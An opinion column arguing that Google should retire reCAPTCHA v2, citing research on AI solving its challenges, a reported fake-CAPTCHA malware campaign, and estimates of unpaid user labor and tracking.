Google, it’s time to kill CAPTCHAS

Are you a robot? Google really, really wants to know. 

The answer to this question is demanded of web users 200 million times a day via CAPTCHAs — “Completely Automated Public Turing test to tell Computers and Humans Apart,” a system owned and operated by Google. 

Google got into the CAPTCHA game in 2009 when it acquired a small company founded by Carnegie Mellon University eggheads called reCAPTCHA. And Google’s intentions for the technology were brilliant.

Google wanted CAPTCHAs to test whether users were human or bots to protect websites from spam and fraud — but with a twist. Google intended to substitute the original, deliberately distorted letters (readable by people but not bots) with accidentally distorted ones — ambiguous scans from the Google Books Library Project. For example, if most users identified a blurry letter as an “E,” that would be confirmed or corrected in the digital book scan. 

The vision for this project was to get the world’s web users to work for free, identifying letters while also thwarting malicious bots. Google later used reCAPTCHA for human identification of ambiguous Street View and Maps photographed objects, including home addresses, street signs, and business names and addresses. More recently, Google has used reCAPTCHA to support its broader AI initiatives across maps, computer vision, speech recognition, and security.

There are many kinds of CAPTCHAs — text-based, image-based, audio, math problems, word problems, time-based, honeypot, picture identification, and invisible. The most common ones are the click-the-checkbox CAPTCHAs and the click-the-pictures-that-contain-a-bus CAPTCHAs. Both are Google’s reCAPTCHA v2.

Google’s most recent version, reCAPTCHA v3, uses behavioral analysis to detect bots without explicit challenges. The user is never forced to stop and solve a puzzle. This approach makes sense and doesn’t divert users in their tracks to solve Google’s recognition problems.

So why do we still see the old kind of reCAPTCHA v2 challenges everywhere, every day?

One reason is that reCAPTCHA v2 is simpler for website owners to implement and manage. They can verify users without having to interpret complex risk scores. It’s also more tangible to website owners because they can see it (whereas v3 operates invisibly in the background). It also has more customizable options and uses fewer cookies. 

Even website owners who use v3 implement v2 as a fallback system, either for especially suspicious traffic or when the v3 engine can’t capture enough data.

While using reCAPTCHA v2 has clear benefits, new events this month radically changed the cost-benefit analysis. 

AI defeats reCAPTCHA

Researchers from ETH Zurich published a research paper Sept. 13 demonstrating that it can solve Google’s reCAPTCHA v2 with 100% accuracy. 

The study reveals that current AI technologies can effectively exploit advanced image-based captchas like reCAPTCHA v2. Any malicious actor anywhere in the world can easily implement an automated bot system that gets past reCAPTCHA v2 challenges. 

Humans can “prove they’re human” with 71-85% accuracy. Machines can “prove they’re human” with 100% accuracy.

Obviously, reCAPTCHA v2 is obsolete. 

reCAPTCHA is a security threat

The antivirus company McAfee announced on Sept 20 that it had discovered a new malware attack that uses fake CAPTCHA challenges. 

Fraudulent CAPTCHA pages are shared on shady websites claiming to offer cracked versions of popular games like Black Myth: Wukong, Skylines II, and Hogwarts Legacy. The fake CAPTCHA test tricks users into performing keyboard actions that secretly paste and execute a PowerShell script that downloads and installs the Lumma Stealer malware. 

The same fraudulent CAPTCHA challenges are also included in phishing emails disguised as GitHub communications about a fake “security vulnerability.”

One reason the phony CAPTCHA scam works is that CAPTCHAs are so ubiquitous. We’ve all been trained like lab rodents to engage with them, so it’s easy to convince the public to use them. The social engineering trick simply hijacks an existing widespread habit. 

The ubiquity of CAPTCHAs itself is an exploitable security threat.

In the past few weeks, it’s become clear that reCAPTCHA v2 is both breakable by AI and a huge security risk. But the biggest problem with reCAPTCHA v2 has existed for years. 

Unconscionable exploitation of users

I can’t stand reCAPTCHA v2 challenges. As a research-obsessed journalist, I open hundreds or thousands of web pages daily. I’ve bookmarked hundreds of pages of news searches, which I open every day to stay informed about my far-flung technical beats. I churn through web pages at high speed, hunting for information. Plus, I use a lot of browser extensions. 

I’m also a digital nomad, traveling globally and constantly accessing random Wi-Fi networks in airports, cafes, restaurants, Airbnbs, and elsewhere. I often need to pretend (for some US services) to be in the United States, so of course, I use a VPN.

Each aspect of how I use the web and Google Search is deemed “suspicious,” so CAPTCHA challenges are constantly arresting my work momentum.

I’m an online speed freak. I’ve spent thousands of dollars on my laptop solely for performance. I don’t want anything slowing me down. So, for Google to stop me in my tracks and make me identify buses, stairs, and crosswalks a hundred times a day while I’m in the writing “zone” is vexing to an extreme. 

Google literally steals my time every day.

And it’s not just me. reCAPTCHA v2 is deployed on nearly three million websites, including over one-third of the top 100,000 sites. 

During the 13 years reCAPTCHA has been around, people have collectively spent 819 million hours solving its challenges, corresponding to at least $6.1 billion in wages never paid for that labor, according to a study by researchers from the University of California, Irvine. 

The researchers note that Google might have profited as much as $888 billion from cookies created by reCAPTCHA sessions and could monetize CAPTCHA activity by tracking users, gathering behavioral data, and creating user profiles for advertising. (Google denied this charge, saying reCAPTCHA v2 user data is used only to improve the service.)

(The researchers also estimate that reCAPTCHA traffic consumed about 134 petabytes of bandwidth, which has so far burned roughly 7.5 million kWh of energy and produced 7.5 million pounds of CO2.)

Google: It’s time to pull the plug

Enough already with the CAPTCHAs that force users to stop and take a test! It’s a massive, unpaid exploitation of users for Google’s gain. The technology is easily defeated by AI. And the very existence of the CAPTCHA concept is now being exploited by malicious actors. 

While reCAPTCHA v3 is probably much better, it’s now clear that reCAPTCHA v2 is beatable with AI, a security risk, and a giant pain in the ass for millions of people. 

Google has killed more than 296 products since 2006, according to the Google Graveyard. 

It’s time for Google to kill again.